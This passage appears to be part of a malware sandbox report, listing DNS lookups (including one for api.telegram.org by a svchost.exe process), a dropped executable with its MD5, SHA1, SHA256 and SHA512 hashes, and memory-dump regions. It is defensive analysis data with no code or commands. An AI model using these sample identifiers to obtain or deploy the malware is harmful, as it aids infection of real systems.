      1
      1

      DNS Request

      1.112.21.104.in-addr.arpa

    • 8.8.8.8:53
      api.telegram.org
      dns
      svchost.exe
      62 B
      78 B
      1
      1

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      220.167.154.149.in-addr.arpa
      dns
      74 B
      167 B
      1
      1

      DNS Request

      220.167.154.149.in-addr.arpa

    • 8.8.8.8:53
      56.163.245.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      56.163.245.4.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      217.135.221.88.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      217.135.221.88.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\inhumate\demonetised.exe

      Filesize

      634KB

      MD5

      80a64f0b8df55d637e135f0eb4fb6b70

      SHA1

      f491fc184d0f15d789e81577e47446478c10ed53

      SHA256

      3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8

      SHA512

      f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432

    • memory/1264-7-0x0000000000C00000-0x0000000001000000-memory.dmp

      Filesize

      4.0MB

    • memory/1264-0-0x0000000000640000-0x00000000007AF000-memory.dmp

      Filesize

      1.4MB

    • memory/1264-13-0x0000000000640000-0x00000000007AF000-memory.dmp

      Filesize

      1.4MB

    • memory/1500-27-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-35-0x00000000069F0000-0x0000000006BB2000-memory.dmp

      Filesize

      1.8MB

    • memory/1500-24-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-25-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-26-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-39-0x0000000006990000-0x000000000699A000-memory.dmp

      Filesize

      40KB

    • memory/1500-28-0x000000007459E000-0x000000007459F000-memory.dmp

      Filesize

      4KB

    • memory/1500-29-0x0000000005440000-0x0000000005490000-memory.dmp

      Filesize

      320KB

    • memory/1500-30-0x0000000005DB0000-0x0000000006354000-memory.dmp

      Filesize

      5.6MB

    • memory/1500-31-0x0000000005500000-0x000000000554E000-memory.dmp

      Filesize

      312KB

    • memory/1500-32-0x0000000005800000-0x000000000589C000-memory.dmp

      Filesize

      624KB

    • memory/1500-38-0x0000000006BC0000-0x0000000006C52000-memory.dmp

      Filesize

      584KB

    • memory/1500-34-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-37-0x000000007459E000-0x000000007459F000-memory.dmp

      Filesize

      4KB

    • memory/1500-36-0x0000000006890000-0x00000000068E0000-memory.dmp

      Filesize

      320KB

    • memory/3724-22-0x0000000001450000-0x0000000001850000-memory.dmp

      Filesize

      4.0MB

    • memory/3724-33-0x00000000004D0000-0x000000000063F000-memory.dmp

      Filesize

      1.4MB

    • memory/3724-14-0x00000000004D0000-0x000000000063F000-memory.dmp

      Filesize

      1.4MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.